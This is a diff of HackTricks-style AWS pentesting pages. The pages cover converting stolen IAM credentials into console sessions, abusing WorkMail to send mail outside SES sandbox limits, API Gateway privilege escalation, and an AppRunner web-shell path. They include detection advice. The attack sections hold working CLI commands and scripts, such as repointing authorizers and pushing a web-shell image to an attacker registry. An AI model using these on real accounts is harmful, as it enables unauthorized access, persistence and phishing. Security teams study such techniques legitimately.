-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## STS
 
 For more information:
@@ -12,28 +10,28 @@ For more information:
 
 ### From IAM Creds to Console
 
-If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
-Note that the the user/role must have the permission **`sts:GetFederationToken`**.
+If you have obtained IAM credentials, you can use AWS's federation endpoint to access the web console. For the `GetFederationToken` path shown below, the caller must be an IAM user with permission to call `sts:GetFederationToken`; a role-based console session should use the `AssumeRole` flow instead.<sup>[[1]](#references)[[2]](#references)</sup>
 
 #### Custom script
 
-The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
+The following script follows AWS's custom identity-broker flow: it uses the default profile and the standard federation endpoint (not GovCloud or China partitions) to produce a console sign-in URL.<sup>[[1]](#references)</sup>
 
 ```bash
-# Get federated creds (you must indicate a policy or they won't have any perms)
-## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
+# Get federated creds (pass a session policy or the federated session has no permissions)
+## A broad policy cannot grant more permissions than the calling IAM user already has
 ## Don't forget to use [--profile <prof_name>] in the first line if you need to
-output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
+output=$(aws sts get-federation-token --name consoler --duration-seconds 43200 --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
+status=$?
 
-if [ $? -ne 0 ]; then
+if [ "$status" -ne 0 ]; then
     echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
-    exit $status
+    exit "$status"
 fi
 
 # Parse the output
-session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
-session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
-session_token=$(echo $output | jq -r '.Credentials.SessionToken')
+session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
+session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
+session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')
 
 # Construct the JSON credentials string
 json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
@@ -45,19 +43,23 @@ federation_endpoint="https://signin.aws.amazon.com/federation"
 resp=$(curl -s "$federation_endpoint" \
     --get \
     --data-urlencode "Action=getSigninToken" \
-    --data-urlencode "SessionDuration=43200" \
     --data-urlencode "Session=$json_creds"
 )
-signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
+signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
 
 
 # Give the URL to login
 echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
 ```
 
+The script intentionally omits the federation endpoint's `SessionDuration` parameter: AWS documents that it must not be used with `GetFederationToken`; the STS `--duration-seconds` value controls the temporary credentials instead.<sup>[[1]](#references)[[2]](#references)</sup>
+
+> [!WARNING]
+> Treat the generated URL as a secret. AWS says the federation URL is valid for 15 minutes, while the temporary credentials embedded in it remain valid for their configured session duration.<sup>[[1]](#references)</sup>
+
 #### aws_consoler
 
-You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
+You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).<sup>[[3]](#references)</sup>
 
 ```bash
 cd /tmp
@@ -68,11 +70,11 @@ aws_consoler [params...] #This will generate a link to login into the console
 ```
 
 > [!WARNING]
-> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
+> Ensure the IAM user used by the `GetFederationToken` path has `sts:GetFederationToken` permission; otherwise provide a role for an `AssumeRole`-based flow.<sup>[[1]](#references)[[2]](#references)</sup>
 
 #### aws-vault
 
-[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
+[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.<sup>[[4]](#references)</sup>
 
 ```bash
 aws-vault list
@@ -81,17 +83,19 @@ aws-vault login jonsmith # Open a browser logged as jonsmith
 ```
 
 > [!NOTE]
-> You can also use **aws-vault** to obtain an **browser console session**
+> You can also use **aws-vault** to obtain a **browser console session**.<sup>[[4]](#references)</sup>
 
 ### From Web Console to IAM Creds
 
-The browser extension **<https://github.com/AI-redteam/clier>** is capable of intercepting from the network IAM credentials before they are protected in the memory of the browser.
+The browser extension **<https://github.com/AI-redteam/clier>** can capture temporary AWS Console credentials by intercepting their network response before they are kept only in browser memory.<sup>[[5]](#references)</sup>
 
 ### **Bypass User-Agent restrictions from Python**
 
-If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
+If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of Python Boto3 based on the user agent), it is possible to use the previous technique to **connect to the web console via a browser**, or directly **modify the Boto3 user-agent** with its `before-call` event hook as follows.<sup>[[6]](#references)</sup>
 
-```bash
+```python
+import boto3
+
 # Shared by ex16x41
 # Create a client
 session = boto3.Session(profile_name="lab6")
@@ -101,23 +105,30 @@ client = session.client("secretsmanager", region_name="us-east-1")
 client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )
 
 # Perform the action
-response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
+response = client.get_secret_value(SecretId="flag_secret")
+print(response["SecretString"])
 ```
 
 ### **`sts:GetFederationToken`**
 
-With this permission it's possible to create a federated identity for the user executing it, limited to the permissions that this user has.
+The `GetFederationToken` operation returns temporary credentials for a federated user; any session policy intersects with the IAM user's policies, so it cannot grant more than the caller already has.<sup>[[2]](#references)</sup>
 
 ```bash
 aws sts get-federation-token --name <username>
 ```
 
-The token returned by sts:GetFederationToken belongs to the federated identity of the calling user, but with restricted permissions. Even if the user has administrator rights, certain actions such as listing IAM users or attaching policies cannot be performed through the federated token.
+The returned credentials are for the federated session and are restricted by the session policy and calling IAM user's permissions. Programmatic use of the credentials cannot call IAM operations (for example, listing IAM users or attaching policies) or STS operations other than `GetCallerIdentity`; AWS notes that this limitation does not apply to console sessions.<sup>[[2]](#references)</sup>
 
-Additionally, this method is somewhat more stealthy, since the federated user does not appear in the AWS Portal, it can only be observed through CloudTrail logs or monitoring tools.
+This operation creates a temporary federated session rather than a persistent IAM user. Federated console sign-ins still produce CloudTrail records, including `GetSigninToken` and `ConsoleLogin`, so the activity remains observable in CloudTrail.<sup>[[2]](#references)[[7]](#references)</sup>
+
+## References
+
+- [1] [Enable custom identity broker access to the AWS console](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_enable-console-custom-url.html)
+- [2] [GetFederationToken - AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html)
+- [3] [NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler)
+- [4] [99designs/aws-vault](https://github.com/99designs/aws-vault)
+- [5] [AI-redteam/clier](https://github.com/AI-redteam/clier)
+- [6] [Extensibility guide - Boto3 documentation](https://docs.aws.amazon.com/boto3/latest/guide/events.html)
+- [7] [AWS Management Console sign-in events - AWS CloudTrail](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - VPN Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## VPN
 
 For more information:
@@ -10,8 +8,8 @@ For more information:
 ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
+## References
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md
@@ -1,42 +1,40 @@
 # AWS - WorkMail Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Abusing WorkMail to bypass SES sandbox
 
-Even if SES is stuck in the **sandbox** (verified-recipient only, ~200 msgs/24h, 1 msg/s), WorkMail has no equivalent restriction. An attacker with long-term keys can spin up disposable mail infra and start sending immediately:
+Even if SES is stuck in the **sandbox** (only verified email addresses/domains or the mailbox simulator, 200 messages/24h, 1 message/s), WorkMail does not impose that same verified-recipient gate, although its own quotas still apply.<sup>[[3]](#references)[[1]](#references)[[2]](#references)</sup> An attacker with compromised long-term keys and control of a sending domain can spin up disposable mail infrastructure and, once provisioning and verification complete, start sending immediately:<sup>[[1]](#references)[[5]](#references)</sup>
 
-1. **Create a WorkMail org (region-scoped)**
+1. **Create a WorkMail org (region-scoped)**<sup>[[6]](#references)[[1]](#references)</sup>
    ```bash
    aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
    ```
-2. **Verify attacker-controlled domains** (WorkMail invokes SES APIs as `workmail.amazonaws.com`):
+2. **Verify attacker-controlled domains** (WorkMail invokes SES APIs as `workmail.amazonaws.com`):<sup>[[1]](#references)[[5]](#references)[[9]](#references)[[10]](#references)</sup>
    ```bash
    aws ses verify-domain-identity --domain attacker-domain.com
    aws ses verify-domain-dkim --domain attacker-domain.com
    ```
-3. **Provision mailbox users** and register them:
+3. **Provision mailbox users** and register them:<sup>[[7]](#references)[[8]](#references)[[1]](#references)</sup>
    ```bash
    aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
    aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
    ```
 
 Notes:
-- Default **recipient cap** documented by AWS: **100,000 external recipients/day per org** (aggregated across users).
-- Domain verification activity will appear in CloudTrail under SES but with **`invokedBy`: `workmail.<region>.amazonaws.com`**, so SES verification events can belong to WorkMail setup rather than SES campaigns.
-- WorkMail mailbox users become **application-layer persistence** independent from IAM users.
+- Default **recipient cap** documented by AWS: **100,000 external recipients/day per AWS account** (external recipients only).<sup>[[2]](#references)</sup>
+- Domain verification activity will appear in CloudTrail under SES but with **`invokedBy`: `workmail.<region>.amazonaws.com`**, so SES verification events can belong to WorkMail setup rather than SES campaigns.<sup>[[1]](#references)[[11]](#references)</sup>
+- WorkMail mailbox users become **application-layer persistence** independent from IAM users.<sup>[[1]](#references)</sup>
 
 ## Sending paths & telemetry gaps
 
 ### Web client (WorkMail UI)
-- Sends surface as **`ses:SendRawEmail`** events in CloudTrail.
-- `userIdentity.type` = `AWSService`, `invokedBy/sourceIPAddress/userAgent` = `workmail.<region>.amazonaws.com`, so the **true client IP is hidden**.
-- `requestParameters` still leak sender (`source`, `fromArn`, `sourceArn`, configuration set) to correlate with newly verified domains/mailboxes.
+- Sends may surface indirectly as **`ses:SendRawEmail`** events in CloudTrail.<sup>[[1]](#references)</sup>
+- `userIdentity.type` = `AWSService`, `invokedBy/sourceIPAddress/userAgent` = `workmail.<region>.amazonaws.com`, so the **true client IP is hidden**.<sup>[[1]](#references)</sup>
+- `requestParameters` still expose sender fields (`source`, `fromArn`, `sourceArn`, configuration set) that can be correlated with newly verified domains/mailboxes.<sup>[[1]](#references)</sup>
 
 ### SMTP (stealthiest)
-- Endpoint: `smtp.mail.<region>.awsapps.com:465` (SMTP over SSL) with the mailbox password.
-- **No CloudTrail data events** are generated for SMTP delivery, even when SES data events are enabled.
-- Ideal detection points are **org/domain/user provisioning** and SES identity ARNs referenced in subsequent web-sent `SendRawEmail` events.
+- Endpoint: `smtp.mail.<region>.awsapps.com:465` (SMTP over SSL) with the mailbox password.<sup>[[4]](#references)[[5]](#references)</sup>
+- **No CloudTrail data events** are generated for SMTP delivery, even when SES data events are enabled.<sup>[[1]](#references)</sup>
+- Ideal detection points are **org/domain/user provisioning** and SES identity ARNs referenced in subsequent web-sent `SendRawEmail` events.<sup>[[1]](#references)</sup>
 
 <details>
 <summary>Example SMTP send via WorkMail</summary>
@@ -66,13 +64,23 @@ with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp:
 
 ## Detection considerations
 
-- If WorkMail is unnecessary, block it via **SCPs** (`workmail:*` deny) at the org level.
-- Alert on provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, and SES verifications with `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
-- Watch for anomalous **`ses:SendRawEmail`** events where the identity ARNs reference new domains and the source IP/UA equals `workmail.<region>.amazonaws.com`.
+- If WorkMail is unnecessary, deny it via an AWS Organizations **SCP** (`workmail:*` deny) for member accounts at the organization level; SCPs do not affect the management account.<sup>[[12]](#references)</sup>
+- Alert on provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, and SES verifications with `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).<sup>[[1]](#references)[[11]](#references)</sup>
+- Watch for anomalous **`ses:SendRawEmail`** events where the identity ARNs reference new domains and the source IP/UA equals `workmail.<region>.amazonaws.com`.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
-- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)
+- [1] [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
+- [2] [Amazon WorkMail quotas](https://docs.aws.amazon.com/workmail/latest/adminguide/workmail_limits.html)
+- [3] [Request production access (Moving out of the Amazon SES sandbox)](https://docs.aws.amazon.com/ses/latest/dg/request-production-access.html)
+- [4] [Amazon WorkMail endpoints and quotas](https://docs.aws.amazon.com/general/latest/gr/workmail.html)
+- [5] [Adding a domain - Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/adminguide/add_domain.html)
+- [6] [CreateOrganization - Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/APIReference/API_CreateOrganization.html)
+- [7] [CreateUser - Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/APIReference/API_CreateUser.html)
+- [8] [RegisterToWorkMail - Amazon WorkMail](https://docs.aws.amazon.com/workmail/latest/APIReference/API_RegisterToWorkMail.html)
+- [9] [VerifyDomainIdentity - Amazon Simple Email Service](https://docs.aws.amazon.com/ses/latest/APIReference/API_VerifyDomainIdentity.html)
+- [10] [VerifyDomainDkim - Amazon Simple Email Service](https://docs.aws.amazon.com/ses/latest/APIReference/API_VerifyDomainDkim.html)
+- [11] [Logging Amazon WorkMail API calls with AWS CloudTrail](https://docs.aws.amazon.com/workmail/latest/adminguide/logging-using-cloudtrail.html)
+- [12] [Service control policies (SCPs) - AWS Organizations](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
@@ -1,7 +1,5 @@
 # AWS - Privilege Escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## AWS Privilege Escalation
 
 The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization.
@@ -10,8 +8,8 @@ The way to escalate your privileges in AWS is to have enough permissions to be a
 > AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
 
 > [!CAUTION]
-> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\
-> So remember that this is another way to **grant privileged permissions** to a principal.
+> If an IAM policy statement uses `"Effect": "Allow"` with `"NotAction": "Someaction"` and a **`Resource`** scope, it can allow all applicable actions except the action(s) listed in `NotAction`; the resource determines which actions are applicable.<sup>[[1]](#references)</sup>\
+> Be careful: this pattern can grant a principal more permissions than intended, including **privileged permissions**.<sup>[[1]](#references)</sup>
 
 **The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.**
 
@@ -24,7 +22,10 @@ The way to escalate your privileges in AWS is to have enough permissions to be a
 - [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py)
 - [Pacu](https://github.com/RhinoSecurityLabs/pacu)
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [IAM JSON policy elements: NotAction](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_notaction.html)
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Apigateway Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Apigateway
 
 For more information check:
@@ -10,9 +8,11 @@ For more information check:
 ../../aws-services/aws-api-gateway-enum.md
 {{#endref}}
 
+API Gateway management IAM actions use the HTTP-verb action names `apigateway:GET`, `apigateway:POST`, `apigateway:PUT`, and `apigateway:PATCH`; the permission headings below use those action names, while the CLI operation names remain in the examples.<sup>[[1]](#references)[[2]](#references)</sup>
+
 ### `apigateway:POST`
 
-With this permission you can generate API keys of the APIs configured (per region).
+With this permission you can create API keys in a Region. A key by itself does not authorize an API call; it must be associated with a usage plan and a deployed API stage whose methods require an API key.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws --region <region> apigateway create-api-key
@@ -22,7 +22,7 @@ aws --region <region> apigateway create-api-key
 
 ### `apigateway:GET`
 
-With this permission you can get generated API keys of the APIs configured (per region).
+With this permission you can enumerate API keys in the current Region; `get-api-keys` can include key values, and `get-api-key --include-value` requests the value for a specific key.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 aws --region <region> apigateway get-api-keys
@@ -31,9 +31,9 @@ aws --region <region> apigateway get-api-key --api-key <key> --include-value
 
 **Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
 
-### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`
+### `apigateway:PATCH`
 
-With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda).
+With both permissions, an attacker can replace a REST API's resource policy. An allow statement can grant the attacker permission to invoke API methods, but the policy is subject to the API's other authorization controls and must be deployed before the change takes effect.<sup>[[2]](#references)[[6]](#references)</sup>
 
 ```bash
 aws apigateway update-rest-api \
@@ -43,35 +43,39 @@ aws apigateway update-rest-api \
 
 **Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info.
 
-### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`
+### `apigateway:PUT`, `apigateway:POST`, `iam:PassRole`
 
 > [!NOTE]
 > Need testing
 
-An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**.
+The `PutIntegration` operation can set a REST API method's integration to a Lambda `AWS_PROXY` URI, and `CreateDeployment` publishes the changed API configuration to a stage. When `--credentials` names a role, API Gateway assumes that integration role; it must trust `apigateway.amazonaws.com`, allow the required Lambda invocation, and be passable by the caller.<sup>[[2]](#references)[[7]](#references)[[8]](#references)[[9]](#references)</sup>
+
+An attacker with these permissions may add an integration to an existing API and invoke a Lambda function through the deployed method. This does not automatically grant the Lambda execution role to the caller or execute arbitrary code; impact depends on the target function, its invocation permissions, and the actions allowed to its execution role.<sup>[[7]](#references)[[9]](#references)</sup>
 
 ```bash
 API_ID="your-api-id"
 RESOURCE_ID="your-resource-id"
 HTTP_METHOD="GET"
 LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
-LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"
+APIGW_INTEGRATION_ROLE_ARN="arn:aws:iam::account-id:role/apigateway-integration-role"
 
 # Add a new integration to the API Gateway REST API
-aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN
+aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $APIGW_INTEGRATION_ROLE_ARN
 
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
 
-**Potential Impact**: Access to resources associated with the Lambda function's IAM role.
+**Potential Impact**: Invocation of the target Lambda; any data or actions exposed by that function or its execution role may become reachable.<sup>[[9]](#references)</sup>
 
-### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`
+### `apigateway:PATCH`, `apigateway:POST`
 
 > [!NOTE]
 > Need testing
 
-An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks (e.g. repoint it to a Lambda that always returns "allow") or to execute arbitrary code when API requests are made.
+The `UpdateAuthorizer` operation uses `apigateway:PATCH`, while `CreateDeployment` uses `apigateway:POST`. If the authorizer is configured with an IAM role for API Gateway to assume, `iam:PassRole` may also be required.<sup>[[2]](#references)</sup>
+
+An attacker with these permissions can **modify an existing API Gateway authorizer** to point at a different Lambda. Because API Gateway evaluates the IAM policy returned by a REST Lambda authorizer to decide whether a method request is allowed, a replacement authorizer that returns an allow policy could bypass the original checks for routes that use it. The replacement Lambda must still be invokable by API Gateway.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 API_ID="your-api-id"
@@ -79,7 +83,7 @@ AUTHORIZER_ID="your-authorizer-id"
 LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
 
 # Update the API Gateway authorizer
-aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations
+aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --patch-operations op='replace',path='/authorizerUri',value="arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations"
 
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
@@ -89,7 +93,7 @@ aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 
 #### HTTP APIs / `apigatewayv2` variant
 
-For HTTP APIs (API Gateway v2), the equivalent operation is updating the authorizer via `apigatewayv2`:
+For HTTP APIs (API Gateway v2), `UpdateAuthorizer` also uses `apigateway:PATCH`; the v2 CLI exposes `--authorizer-uri` directly.<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 REGION="us-east-1"
@@ -101,24 +105,41 @@ AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAM
 aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
 ```
 
-### `apigateway:UpdateVpcLink`
+### `apigateway:PATCH`
 
 > [!NOTE]
 > Need testing
 
-An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**.
+`UpdateVpcLink` uses `apigateway:PATCH` and accepts patch operations that can change the VPC link's `targetArns`. A VPC link is used by an integration to connect API Gateway to a Network Load Balancer in a VPC; target load balancers must be owned by the same AWS account as the API owner.<sup>[[2]](#references)[[7]](#references)[[15]](#references)</sup>
+
+An attacker with this permission can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting requests from methods using that private integration to unauthorized or malicious resources**.<sup>[[7]](#references)[[15]](#references)</sup>
 
 ```bash
 VPC_LINK_ID="your-vpc-link-id"
 NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"
 
 # Update the VPC Link
-aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"
+aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations "op=replace,path=/targetArns,value='[\"$NEW_NLB_ARN\"]'"
 ```
 
-**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic.
+**Potential Impact**: Requests from methods using the VPC link may be redirected to an unauthorized NLB, causing data exposure or traffic disruption.<sup>[[7]](#references)[[15]](#references)</sup>
+
+## References
+
+- [1] [How Amazon API Gateway works with IAM](https://docs.aws.amazon.com/apigateway/latest/developerguide/security_iam_service-with-iam.html)
+- [2] [Actions, resources, and condition keys for Amazon API Gateway Management](https://docs.aws.amazon.com/service-authorization/latest/reference/list_apigateway.html)
+- [3] [Set up API keys for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-setup-api-keys.html)
+- [4] [GetApiKeys - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_GetApiKeys.html)
+- [5] [GetApiKey - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_GetApiKey.html)
+- [6] [Create and attach an API Gateway resource policy to an API](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-resource-policies-create-attach.html)
+- [7] [PutIntegration - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_PutIntegration.html)
+- [8] [CreateDeployment - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_CreateDeployment.html)
+- [9] [Control access to a REST API with IAM permissions](https://docs.aws.amazon.com/apigateway/latest/developerguide/permissions.html)
+- [10] [update-authorizer - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigateway/update-authorizer.html)
+- [11] [Use API Gateway Lambda authorizers](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-use-lambda-authorizer.html)
+- [12] [Authorizer - Amazon API Gateway](https://docs.aws.amazon.com/apigatewayv2/latest/api-reference/apis-apiid-authorizers-authorizerid.html)
+- [13] [update-authorizer - AWS CLI Command Reference (API Gateway V2)](https://docs.aws.amazon.com/cli/latest/reference/apigatewayv2/update-authorizer.html)
+- [14] [Actions, resources, and condition keys for Amazon API Gateway Management V2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_apigatewayv2.html)
+- [15] [UpdateVpcLink - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_UpdateVpcLink.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc/README.md
@@ -1,12 +1,10 @@
 # AWS - AppRunner Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AppRunner
 
 ### `iam:PassRole`, `apprunner:CreateService`
 
-An attacker with these permissions can create an AppRunner service with an attached IAM role, potentially escalating privileges by accessing the role's credentials.
+An identity with `apprunner:CreateService` and `iam:PassRole` can create a service whose compute instances run with a chosen instance role; if code in that service can read the container credentials endpoint, it can obtain credentials with that role's permissions.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 The attacker first creates a Dockerfile that serves as a web shell to execute arbitrary commands on the AppRunner container.
 
@@ -43,17 +41,19 @@ CMD ["./main"]
 ```
 
 Then, push this image to an ECR repository.
-By pushing the image to a public repository in an AWS account controlled by the attacker, privilege escalation is possible even if the victim's account doesn't have permissions to manipulate ECR.
+By pushing the image to a public repository in an AWS account controlled by the attacker, the victim does not need an ECR access role for App Runner to pull it: AWS documents that an access role is required for private ECR images but not for ECR Public, while the public-registry workflow still requires the attacker to authenticate and have permission to push to their repository.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```sh
 IMAGE_NAME=public.ecr.aws/<alias>/<namespace>/<repo-name>:latest
 docker buildx build --platform linux/amd64 -t $IMAGE_NAME .
-aws ecr-public get-login-password | docker login --username AWS --password-stdin public.ecr.aws
+aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws
 docker push $IMAGE_NAME
 docker logout public.ecr.aws
 ```
 
-Next, the attacker creates an AppRunner service configured with this web shell image and the IAM Role they want to exploit.
+The target role must trust `tasks.apprunner.amazonaws.com`; App Runner uses this service principal for an instance role.<sup>[[1]](#references)</sup>
+
